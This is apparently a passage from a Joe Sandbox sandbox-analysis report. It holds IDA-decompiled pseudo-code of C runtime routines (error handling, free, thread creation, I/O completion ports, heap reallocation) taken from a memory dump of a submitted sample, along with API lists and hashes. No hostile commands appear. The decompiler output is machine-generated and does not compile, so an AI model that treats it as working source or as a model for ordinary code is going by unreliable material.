                          						if(__eflags == 0) {
                          							_t5 =  *0x13a4200; // 0x6
                          							goto L22;
                          						} else {
                          							__eflags = _t60 - 0xffffffff;
                          							if(_t60 == 0xffffffff) {
                          								L31:
                          								E0134B472(_t39, _t43, _t49, _t53, _t60);
                          								asm("int3");
                          								_push(_t39);
                          								_push(_t60);
                          								_push(_t53);
                          								_t61 = GetLastError();
                          								_t9 =  *0x13a4200; // 0x6
                          								__eflags = _t9 - 0xffffffff;
                          								if(__eflags == 0) {
                          									L38:
                          									_t10 = E013561F6(__eflags, _t9, 0xffffffff);
                          									__eflags = _t10;
                          									if(_t10 == 0) {
                          										goto L35;
                          									} else {
                          										_t54 = E01355C32(1, 0x364);
                          										__eflags = _t54;
                          										if(__eflags != 0) {
                          											__eflags = E013561F6(__eflags,  *0x13a4200, _t54);
                          											if(__eflags != 0) {
                          												E0135580E(_t54, 0x13ab4a8);
                          												E01355C8F(0);
                          												goto L45;
                          											} else {
                          												_t40 = 0;
                          												E013561F6(__eflags,  *0x13a4200, 0);
                          												_push(_t54);
                          												goto L41;
                          											}
                          										} else {
                          											_t40 = 0;
                          											__eflags = 0;
                          											E013561F6(0,  *0x13a4200, 0);
                          											_push(0);
                          											L41:
                          											E01355C8F();
                          											goto L36;
                          										}
                          									}
                          								} else {
                          									_t54 = E013561B7(__eflags, _t9);
                          									__eflags = _t54;
                          									if(__eflags == 0) {
                          										_t9 =  *0x13a4200; // 0x6
                          										goto L38;
                          									} else {
                          										__eflags = _t54 - 0xffffffff;
                          										if(_t54 != 0xffffffff) {
                          											L45:
                          											_t40 = _t54;
                          										} else {
                          											L35:
                          											_t40 = 0;
                          											__eflags = 0;
                          											L36:
                          											_t54 = _t40;
                          										}
                          									}
                          								}
                          								SetLastError(_t61);
                          								asm("sbb edi, edi");
                          								_t56 =  ~_t54 & _t40;
                          								__eflags = _t56;
                          								return _t56;
                          							} else {
                          								L29:
                          								__eflags = _t60;
                          								if(_t60 == 0) {
                          									goto L31;
                          								} else {
                          									return _t60;
                          								}
                          							}
                          						}
                          					}
                          				} else {
                          					return _t53;
                          				}
                          			}

                          APIs
                          • GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
                          • _free.LIBCMT ref: 01355A42
                          • _free.LIBCMT ref: 01355A78
                          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: ErrorLast_free
                          • String ID:
                          • API String ID: 2283115069-0
                          • Opcode ID: 5276bbba8f8e81f77011a6ffa34af4928c609fe90df18937c961311b3d45fe4b
                          • Instruction ID: 8801e91ef5a67ef7baf4a209ff5b984fb1244c9178b0a03f99102ea0e49ed850
                          • Opcode Fuzzy Hash: 5276bbba8f8e81f77011a6ffa34af4928c609fe90df18937c961311b3d45fe4b
                          • Instruction Fuzzy Hash: 8E11CA726003076EF7A225BC6CC1D77255D9BE1F7DB590234FE25921D6EF60AC014260
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 380 134a818-134a82e call 134a977 382 134a833-134a839 380->382 383 134a87e 382->383 384 134a83b-134a86a call 13559e0 call 1357db0 382->384 386 134a880-134a884 383->386 390 134a885-134a896 call 13576ed 384->390 391 134a86c-134a86f 384->391 390->383 398 134a898-134a8b2 call 1357db0 390->398 392 134a875-134a878 391->392 393 134a96c-134a976 call 13496e7 391->393 392->383 392->393 401 134a8b4-134a8b7 398->401 402 134a8cf-134a8e1 398->402 403 134a8bd-134a8c0 401->403 404 134a96a 401->404 405 134a8e3-134a8e9 402->405 406 134a909-134a917 402->406 403->404 407 134a8c6-134a8cd call 1355c8f 403->407 404->393 405->406 408 134a8eb-134a906 call 1355c8f 405->408 409 134a949-134a965 406->409 410 134a919-134a925 406->410 407->383 408->406 409->386 410->409 413 134a927-134a92c 410->413 413->409 416 134a92e-134a944 call 1355c8f 413->416 416->409
                          C-Code - Quality: 76%
                          			E0134A818(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                          				intOrPtr _v0;
                          				char _v8;
                          				char _v12;
                          				signed int _v16;
                          				char _v20;
                          				signed int _v44;
                          				char _v80;
                          				char _v84;
                          				void* _v93;
                          				char _v100;
                          				char _v104;
                          				char* _v108;
                          				char _v112;
                          				void* __ebp;
                          				intOrPtr* _t70;
                          				signed int _t71;
                          				char _t72;
                          				void* _t75;
                          				signed int _t80;
                          				signed int _t84;
                          				signed int _t95;
                          				signed int _t106;
                          				signed int _t110;
                          				void* _t111;
                          				char _t116;
                          				void* _t120;
                          				signed int _t125;
                          				signed int _t126;
                          				void* _t129;
                          				signed int _t131;
                          				signed int _t133;
                          				signed int _t143;
                          				void* _t145;
                          				char _t155;
                          				intOrPtr* _t157;
                          				intOrPtr _t159;
                          				void* _t160;
                          				signed int _t163;
                          				void* _t167;
                          				void* _t169;
                          				void* _t170;
                          				void* _t171;
                          
                          				_t153 = __edx;
                          				_push(__ebx);
                          				_push(__esi);
                          				_t163 = __ecx;
                          				_push(__edi);
                          				_push( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))));
                          				_t70 =  *((intOrPtr*)(__ecx));
                          				_push( *_t70); // executed
                          				L21(); // executed
                          				_t157 = _t70;
                          				_pop(_t129);
                          				if(_t157 == 0) {
                          					L4:
                          					_t71 = 0;
                          					goto L5;
                          				} else {
                          					_t72 = E013559E0(_t129, __edx);
                          					_v12 = _t72;
                          					_t125 = 0;
                          					_v20 =  *((intOrPtr*)(_t72 + 0x4c));
                          					_t131 =  *(_t72 + 0x48);
                          					_v16 = _t131;
                          					_v8 = 0;
                          					_t75 = E01357DB0(0, _t131, __edx,  &_v8, 0, 0, _t157, 0,  &_v20);
                          					_t170 = _t169 + 0x18;
                          					if(_t75 == 0) {
                          						_t126 = E013576ED(_v8 + 4);
                          						__eflags = _t126;
                          						if(_t126 == 0) {
                          							goto L4;
                          						} else {
                          							_t131 =  &_v20;
                          							_t13 = _t126 + 4; // 0x4
                          							_t80 = E01357DB0(_t126, _t131, __edx, 0, _t13, _v8, _t157, 0xffffffff, _t131);
                          							_t170 = _t170 + 0x18;
                          							__eflags = _t80;
                          							if(_t80 == 0) {
                          								_t133 = _t131 | 0xffffffff;
                          								_t159 = _v20;
                          								_t16 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xc7d81
                          								__eflags =  *(_t159 + _t16 + 0x24);
                          								if(__eflags != 0) {
                          									asm("lock xadd [edx], eax");
                          									if(__eflags == 0) {
                          										_t19 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xc7d81
                          										E01355C8F( *((intOrPtr*)(_t159 + _t19 + 0x24)));
                          										_pop(_t143);
                          										 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) =  *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) & 0x00000000;
                          										_t133 = _t143 | 0xffffffff;
                          										__eflags = _t133;
                          									}
                          								}
                          								_t155 = _v12;
                          								_t84 =  *0x13a4478; // 0xfffffffe
                          								__eflags =  *(_t155 + 0x350) & _t84;
                          								if(( *(_t155 + 0x350) & _t84) == 0) {
                          									_t32 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xc7d81
                          									__eflags =  *(_t159 + _t32 + 0x24);
                          									if( *(_t159 + _t32 + 0x24) != 0) {
                          										asm("lock xadd [eax], ecx");
                          										__eflags = _t133 == 1;
                          										if(_t133 == 1) {
                          											_t35 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xc7d81
                          											E01355C8F( *((intOrPtr*)(_t159 + _t35 + 0x24)));
                          											_t95 =  *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163));
                          											_t37 = _t159 + 0x24 + _t95 * 8;
                          											 *_t37 =  *(_t159 + 0x24 + _t95 * 8) & 0x00000000;
                          											__eflags =  *_t37;
                          										}
                          									}
                          								}
                          								_t43 = _t159 + 0xc; // 0x55ff8b00
                          								_t44 = _t126 + 4; // 0x4
                          								_t71 = _t44;
                          								 *_t126 =  *_t43;
                          								 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) = _t126;
                          								 *((intOrPtr*)(_t159 + 0x1c + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8)) = _t71;
                          								L5:
                          								return _t71;
                          							} else {
                          								__eflags = _t80 - 0x16;
                          								if(_t80 == 0x16) {
                          									L19:
                          									_t125 = 0;
                          									__eflags = 0;
                          									goto L20;
                          								} else {
                          									__eflags = _t80 - 0x22;
                          									if(_t80 == 0x22) {
                          										goto L19;
                          									} else {
                          										E01355C8F(_t126);
                          										goto L4;
                          									}
                          								}
                          							}
                          						}
                          					} else {
                          						if(_t75 == 0x16 || _t75 == 0x22) {
                          							L20:
                          							_push(_t125);
                          							_push(_t125);
                          							_push(_t125);
                          							_push(_t125);
                          							_push(_t125);
                          							E013496E7();
                          							asm("int3");
                          							_t167 = _t170;
                          							_push(_t131);
                          							__eflags = _v44;
                          							if(_v44 != 0) {
                          								_push(_t163);
                          								_push(_t157);
                          								_t160 = 0;
                          								_t106 = E01357AF1( &_v12, 0, 0, _a4, 0x7fffffff);
                          								_t171 = _t170 + 0x14;
                          								__eflags = _t106;
                          								if(_t106 == 0) {
                          									L26:
                          									_t163 = E01355C32(_v12, 2);
                          									_pop(_t145);
                          									__eflags = _t163;
                          									if(_t163 == 0) {
                          										L32:
                          										E01355C8F(_t163);
                          										return _t160;
                          									} else {
                          										_t110 = E01357AF1(_t160, _t163, _v12, _a4, 0xffffffff);
                          										_t171 = _t171 + 0x14;
                          										__eflags = _t110;
                          										if(_t110 == 0) {
                          											_t111 = E01354374(_t145, _t153, _v0, _t163); // executed
                          											_t160 = _t111;
                          											goto L32;
                          										} else {
                          											__eflags = _t110 - 0x16;
                          											if(_t110 == 0x16) {
                          												goto L33;
                          											} else {
                          												__eflags = _t110 - 0x22;
                          												if(_t110 == 0x22) {
                          													goto L33;
                          												} else {
                          													goto L32;
                          												}
                          											}
                          										}
                          									}
                          								} else {
                          									__eflags = _t106 - 0x16;
                          									if(_t106 == 0x16) {
                          										L33:
                          										_push(_t160);
                          										_push(_t160);
                          										_push(_t160);
                          										_push(_t160);
                          										_push(_t160);
                          										E013496E7();
                          										asm("int3");
                          										_push(_t167);
                          										E01356513();
                          										_v112 =  &_v84;
                          										_v108 =  &_v80;
                          										_t116 = 4;
                          										_v100 = _t116;
                          										_v104 = _t116;
                          										_push( &_v100);
                          										_push( &_v112);
                          										_push( &_v104); // executed
                          										_t120 = E0134A7BD(_t125, _t160, _t163, __eflags); // executed
                          										return _t120;
                          									} else {
                          										__eflags = _t106 - 0x22;
                          										if(_t106 == 0x22) {
                          											goto L33;
                          										} else {
                          											goto L26;
                          										}
                          									}
                          								}
                          							} else {
                          								return E01354374(_t131, _t153, _v0, 0);
                          							}
                          						} else {
                          							goto L4;
                          						}
                          					}
                          				}
                          			}

                          APIs
                            • Part of subcall function 013559E0: GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
                            • Part of subcall function 013559E0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83
                          • _free.LIBCMT ref: 0134A8C7
                          • _free.LIBCMT ref: 0134A8F5
                          • _free.LIBCMT ref: 0134A938
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: _free$ErrorLast
                          • String ID:
                          • API String ID: 3291180501-0
                          • Opcode ID: 0950e7d0c0ae866d2e0e4576740c8b78312e1d675f69563de274ece41a584e81
                          • Instruction ID: e55a625acac970c1e8b395cff7d17fea6c1e563914d3ea9537bd986da6e13a5a
                          • Opcode Fuzzy Hash: 0950e7d0c0ae866d2e0e4576740c8b78312e1d675f69563de274ece41a584e81
                          • Instruction Fuzzy Hash: B5415D396001069FEB64DFACC881E65BBF9FF49368724066DE556C7291EB31F810DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 419 134a977-134a981 420 134a991-134a9ad call 1357af1 419->420 421 134a983-134a990 call 1354374 419->421 426 134a9af-134a9b2 420->426 427 134a9b9-134a9c9 call 1355c32 420->427 428 134a9b4-134a9b7 426->428 429 134aa07-134aa43 call 13496e7 call 1356513 call 134a7bd 426->429 434 134a9fa-134aa06 call 1355c8f 427->434 435 134a9cb-134a9df call 1357af1 427->435 428->427 428->429 449 134aa48-134aa49 429->449 443 134a9e1-134a9e4 435->443 444 134a9ed-134a9f1 call 1354374 435->444 443->429 447 134a9e6-134a9e9 443->447 448 134a9f6-134a9f8 444->448 447->429 450 134a9eb 447->450 448->434 450->434
                          C-Code - Quality: 71%
                          			E0134A977(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                          				char _v8;
                          				char _v28;
                          				char _v32;
                          				void* _v41;
                          				char _v48;
                          				char _v52;
                          				char* _v56;
                          				char _v60;
                          				void* __ebp;
                          				void* _t20;
                          				void* _t24;
                          				void* _t25;
                          				char _t30;
                          				void* _t34;
                          				void* _t36;
                          				void* _t39;
                          				void* _t46;
                          				void* _t48;
                          				void* _t54;
                          				void* _t55;
                          
                          				_t50 = __esi;
                          				_push(__ecx);
                          				if(_a8 != 0) {
                          					_push(__esi);
                          					_push(__edi);
                          					_t48 = 0;
                          					_t20 = E01357AF1( &_v8, 0, 0, _a8, 0x7fffffff);
                          					_t55 = _t54 + 0x14;
                          					__eflags = _t20;
                          					if(_t20 == 0) {
                          						L5:
                          						_t50 = E01355C32(_v8, 2);
                          						_pop(_t39);
                          						__eflags = _t50;
                          						if(_t50 == 0) {
                          							L11:
                          							E01355C8F(_t50);
                          							return _t48;
                          						} else {
                          							_t24 = E01357AF1(_t48, _t50, _v8, _a8, 0xffffffff);
                          							_t55 = _t55 + 0x14;
                          							__eflags = _t24;
                          							if(_t24 == 0) {
                          								_t25 = E01354374(_t39, _t46, _a4, _t50); // executed
                          								_t48 = _t25;
                          								goto L11;
                          							} else {
                          								__eflags = _t24 - 0x16;
                          								if(_t24 == 0x16) {
                          									goto L12;
                          								} else {
                          									__eflags = _t24 - 0x22;
                          									if(_t24 == 0x22) {
                          										goto L12;
                          									} else {
                          										goto L11;
                          									}
                          								}
                          							}
                          						}
                          					} else {
                          						__eflags = _t20 - 0x16;
                          						if(_t20 == 0x16) {
                          							L12:
                          							_push(_t48);
                          							_push(_t48);
                          							_push(_t48);
                          							_push(_t48);
                          							_push(_t48);
                          							E013496E7();
                          							asm("int3");
                          							E01356513();
                          							_v60 =  &_v32;
                          							_v56 =  &_v28;
                          							_t30 = 4;
                          							_v48 = _t30;
                          							_v52 = _t30;
                          							_push( &_v48);
                          							_push( &_v60);
                          							_push( &_v52); // executed
                          							_t34 = E0134A7BD(_t36, _t48, _t50, __eflags); // executed
                          							return _t34;
                          						} else {
                          							__eflags = _t20 - 0x22;
                          							if(_t20 == 0x22) {
                          								goto L12;
                          							} else {
                          								goto L5;
                          							}
                          						}
                          					}
                          				} else {
                          					return E01354374(__ecx, _t46, _a4, 0);
                          				}
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: __cftoe$_free
                          • String ID:
                          • API String ID: 1303422935-0
                          • Opcode ID: cee44a2af2c25bae6a2c7644e7e0f92bf85b6013b7b46206c0b208a7436385f0
                          • Instruction ID: dc261a8663ba7817c0414163d3114f937dd678c9d96a99c182cfcbbc72580249
                          • Opcode Fuzzy Hash: cee44a2af2c25bae6a2c7644e7e0f92bf85b6013b7b46206c0b208a7436385f0
                          • Instruction Fuzzy Hash: 1821F4768041097BEF24AA9CCC41EDF3BE89F84628F604226F917D2190EB30E740DA50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 451 1349877-1349882 452 1349884-1349897 call 134b45f call 13496ba 451->452 453 1349898-13498ab call 1349827 451->453 459 13498ad-13498ca CreateThread 453->459 460 13498d9 453->460 462 13498cc-13498d8 GetLastError call 134b429 459->462 463 13498e8-13498ed 459->463 464 13498db-13498e7 call 1349799 460->464 462->460 465 13498f4-13498f8 463->465 466 13498ef-13498f2 463->466 465->464 466->465
                          C-Code - Quality: 90%
                          			E01349877(void* __ecx, struct _SECURITY_ATTRIBUTES* _a4, long _a8, intOrPtr _a12, intOrPtr _a16, long _a20, void* _a24) {
                          				signed int _v8;
                          				long _v12;
                          				void* _t14;
                          				void* _t17;
                          				void* _t29;
                          				void* _t32;
                          
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t34 = _a12;
                          				if(_a12 != 0) {
                          					_t14 = E01349827(__ecx, __eflags, _a12, _a16); // executed
                          					_v8 = _t14;
                          					__eflags = _t14;
                          					if(_t14 == 0) {
                          						L5:
                          						_t32 = 0;
                          						__eflags = 0;
                          					} else {
                          						_t17 = CreateThread(_a4, _a8, E0134971B, _t14, _a20,  &_v12); // executed
                          						_t32 = _t17;
                          						__eflags = _t32;
                          						if(_t32 != 0) {
                          							_t29 = _a24;
                          							__eflags = _t29;
                          							if(_t29 != 0) {
                          								 *_t29 = _v12;
                          							}
                          							_v8 = _v8 & 0x00000000;
                          						} else {
                          							E0134B429(GetLastError());
                          							goto L5;
                          						}
                          					}
                          					E01349799( &_v8);
                          					return _t32;
                          				} else {
                          					 *((intOrPtr*)(E0134B45F(_t34))) = 0x16;
                          					E013496BA();
                          					return 0;
                          				}
                          			}










                          APIs
                          • CreateThread.KERNELBASE ref: 013498C0
                          • GetLastError.KERNEL32(?,?,?,012F6A62,00000000,00000000,012F8C80,00000000,00000000,?,?,?), ref: 013498CC
                          • __dosmaperr.LIBCMT ref: 013498D3
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: CreateErrorLastThread__dosmaperr
                          • String ID:
                          • API String ID: 2744730728-0
                          • Opcode ID: 32e130603e2451cf455b9c2be170762513d5636ef3992995f73aa68042352219
                          • Instruction ID: 22d3f202c22b2014123dc606c67b132c32a2805161a6db4a5773e034cd88baa0
                          • Opcode Fuzzy Hash: 32e130603e2451cf455b9c2be170762513d5636ef3992995f73aa68042352219
                          • Instruction Fuzzy Hash: 72014C7250021AEFEF159FA9DC05AEF7FE9EF4826CF004158E901A6254EB71E950DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 479 13085b0-1308602 480 1308604 479->480 481 1308608-13086c7 call 1303aa0 call 1308a50 call 130a220 CreateIoCompletionPort 479->481 480->481 488 1308792-13087bf 481->488 489 13086cd-13086d1 481->489 490 13087c1-13087c9 488->490 491 13087e2-13087fe call 132ea79 488->491 489->488 492 13086d7-13086e5 call 1349877 489->492 490->491 493 13087cb-13087d9 490->493 496 13086ea-13086f2 492->496 493->491 501 13087db-13087dd 493->501 499 1308788-130878c 496->499 500 13086f8-1308732 call 12f51b0 496->500 499->488 499->492 504 1308734-130875a 500->504 505 130875c-1308769 call 130a320 500->505 501->491 506 130876c-1308773 504->506 505->506 506->499 509 1308775-1308785 call 12f56a0 506->509 509->499
                          C-Code - Quality: 42%
                          			E013085B0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* _a4, void* _a8) {
                          				void* _v8;
                          				char _v16;
                          				signed int _v20;
                          				void* _v24;
                          				signed int _v28;
                          				void* _v32;
                          				short _v48;
                          				void* _v52;
                          				long _v56;
                          				void* _v60;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t67;
                          				signed int _t68;
                          				long _t75;
                          				signed int _t76;
                          				signed int _t81;
                          				void* _t87;
                          				void** _t89;
                          				void* _t101;
                          				void* _t107;
                          				signed int _t110;
                          				void* _t111;
                          				signed int _t112;
                          				void* _t113;
                          				void** _t115;
                          
                          				_t106 = __edi;
                          				_t101 = __edx;
                          				_t87 = __ebx;
                          				_push(0xffffffff);
                          				_push(0x1366c2e);
                          				_push( *[fs:0x0]);
                          				_t67 =  *0x13a4018; // 0x39cca9f6
                          				_t68 = _t67 ^ _t112;
                          				_v20 = _t68;
                          				_push(__edi);
                          				_push(_t68);
                          				 *[fs:0x0] =  &_v16;
                          				_t110 = __ecx;
                          				_v52 = __ecx;
                          				_v60 = __ecx;
                          				_push(6);
                          				_t115 = _t113 - 0x24;
                          				_v8 = 0;
                          				_t89 = _t115;
                          				 *_t89 = 0;
                          				_t89[1] = 0;
                          				if(_a8 != 0) {
                          					asm("lock inc dword [eax+0x4]");
                          				}
                          				 *_t89 = _a4;
                          				_t89[1] = _a8;
                          				E01303AA0(_t110, _t101);
                          				 *_t110 = 0x1396af4;
                          				 *((char*)(_t110 + 0x18)) = 0;
                          				 *(_t110 + 0x2c) = 0;
                          				 *((intOrPtr*)(_t110 + 0x30)) = 0xf;
                          				 *((char*)(_t110 + 0x1c)) = 0;
                          				 *(_t110 + 0x38) = 0;
                          				 *(_t110 + 0x3c) = 0;
                          				 *(_t110 + 0x40) = 0;
                          				 *(_t110 + 0x44) = 0;
                          				 *((intOrPtr*)(_t110 + 0x48)) = 0x1030307;
                          				 *(_t110 + 0x50) = 0;
                          				 *(_t110 + 0x54) = 0;
                          				 *(_t110 + 0x58) = 0;
                          				 *(_t110 + 0x5c) = 0;
                          				 *(_t110 + 0x60) = 0;
                          				 *(_t110 + 0x64) = 0;
                          				 *(_t110 + 0x68) = 0;
                          				 *(_t110 + 0x7c) = 0;
                          				 *((intOrPtr*)(_t110 + 0x80)) = 0xf;
                          				 *((char*)(_t110 + 0x6c)) = 0;
                          				_t91 = _t110;
                          				_v8 = 4;
                          				E01308A50(_t110); // executed
                          				_t75 = E0130A220(); // executed
                          				_v56 = _t75;
                          				_t76 = CreateIoCompletionPort(0xffffffff, 0, 0, _t75);
                          				 *0x13a4b80 = _t76;
                          				if(_t76 == 0xffffffff || _v56 <= 0) {
                          					L11:
                          					_t107 = _a8;
                          					 *(_t110 + 0x84) = 0;
                          					 *(_t110 + 0x88) = 0;
                          					 *(_t110 + 0x8c) = 0;
                          					 *(_t110 + 0x90) = 0;
                          					if(_t107 != 0) {
                          						asm("lock xadd [edi+0x4], eax");
                          						if((_t76 | 0xffffffff) == 0) {
                          							_t81 =  *( *_t107)();
                          							asm("lock xadd [edi+0x8], eax");
                          							if((_t81 | 0xffffffff) == 0) {
                          								 *((intOrPtr*)( *_t107 + 4))();
                          							}
                          						}
                          					}
                          					 *[fs:0x0] = _v16;
                          					_pop(_t111);
                          					return E0132EA79(_v20 ^ _t112, _t111);
                          				} else {
                          					do {
                          						_t76 = E01349877(_t91, 0, 0, E0130A110, _t110, 0, 0); // executed
                          						_t115 =  &(_t115[6]);
                          						_v52 = _t76;
                          						if(_t76 != 0) {
                          							_v32 = 0;
                          							_v28 = 7;
                          							_v48 = 0;
                          							_v24 = 0xffffffff;
                          							_push(3);
                          							_v8 = 5;
                          							E012F51B0(_t87,  &_v48, _t106, _t110, "wrk");
                          							_t76 =  *(_t110 + 0x64);
                          							_v24 = _v52;
                          							if(_t76 ==  *(_t110 + 0x68)) {
                          								_push( &_v48);
                          								_t76 = E0130A320(_t87, _t110 + 0x60, _t76);
                          								_t91 = _v28;
                          							} else {
                          								asm("movups xmm0, [ebp-0x2c]");
                          								_t91 = 7;
                          								_v48 = 0;
                          								asm("movups [eax], xmm0");
                          								asm("movq xmm0, [ebp-0x1c]");
                          								asm("movq [eax+0x10], xmm0");
                          								 *(_t76 + 0x18) = _v52;
                          								 *(_t110 + 0x64) =  *(_t110 + 0x64) + 0x1c;
                          							}
                          							_v8 = 4;
                          							if(_t91 >= 8) {
                          								_push(2 + _t91 * 2);
                          								_t76 = E012F56A0(_t87, _t106, _v48);
                          								_t115 =  &(_t115[2]);
                          							}
                          						}
                          						_t56 =  &_v56;
                          						 *_t56 = _v56 - 1;
                          					} while ( *_t56 != 0);
                          					goto L11;
                          				}
                          			}






























                          APIs
                          • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 013086B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: CompletionCreatePort
                          • String ID: wrk
                          • API String ID: 499945625-1771439203
                          • Opcode ID: 2141a9d4dd1d2aeecd8a59e11739ff8a9b194206aba1dbc8f1de7836de2c2386
                          • Instruction ID: 20e8c1fa6395a9051174214ea962858e44dc80fbee1085686c1155fbf1a719bf
                          • Opcode Fuzzy Hash: 2141a9d4dd1d2aeecd8a59e11739ff8a9b194206aba1dbc8f1de7836de2c2386
                          • Instruction Fuzzy Hash: 3B6189B09017449FE721CF68C864B9ABBF4FF44728F10865DE5A69B7C0D7B5A508CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 1349c40-13568f2 662 13568f4-13568fd call 13576ed 660->662 663 13568ff-1356905 660->663 672 1356923-1356925 662->672 665 1356907-135690e call 1355c8f 663->665 666 1356910-1356913 663->666 679 1356920 665->679 669 1356915-135691a call 134b45f 666->669 670 135693a-135694c RtlReAllocateHeap 666->670 669->679 673 1356926-135692d call 1355057 670->673 674 135694e 670->674 673->669 681 135692f-1356938 call 135287b 673->681 678 1356922 674->678 678->672 679->678 681->669 681->670
                          C-Code - Quality: 95%
                          			E01349C40(long _a4) {
                          				void* _t4;
                          				void* _t13;
                          				long _t16;
                          
                          				_pop(_t18);
                          				_t13 = _a4;
                          				if(_t13 != 0) {
                          					_t16 = _a4;
                          					__eflags = _t16;
                          					if(_t16 != 0) {
                          						__eflags = _t16 - 0xffffffe0;
                          						if(__eflags <= 0) {
                          							while(1) {
                          								_t4 = RtlReAllocateHeap( *0x13ab7d8, 0, _t13, _t16); // executed
                          								__eflags = _t4;
                          								if(_t4 != 0) {
                          									break;
                          								}
                          								__eflags = E01355057();
                          								if(__eflags == 0) {
                          									goto L6;
                          								} else {
                          									__eflags = E0135287B(__eflags, _t16);
                          									if(__eflags == 0) {
                          										goto L6;
                          									} else {
                          										continue;
                          									}
                          								}
                          								L14:
                          							}
                          						} else {
                          							L6:
                          							 *((intOrPtr*)(E0134B45F(__eflags))) = 0xc;
                          							goto L7;
                          						}
                          					} else {
                          						E01355C8F(_t13);
                          						L7:
                          						_t4 = 0;
                          						__eflags = 0;
                          					}
                          				} else {
                          					_t4 = E013576ED(_a4);
                          				}
                          				return _t4;
                          				goto L14;
                          			}







                          APIs
                          • _free.LIBCMT ref: 01356908
                            • Part of subcall function 013576ED: RtlAllocateHeap.NTDLL(00000000,00013385,00013385,?,0135BEE9,00000220,0135F479,00013385,?,?,?,?,00000000,00000000,?,0135F479), ref: 0135771F
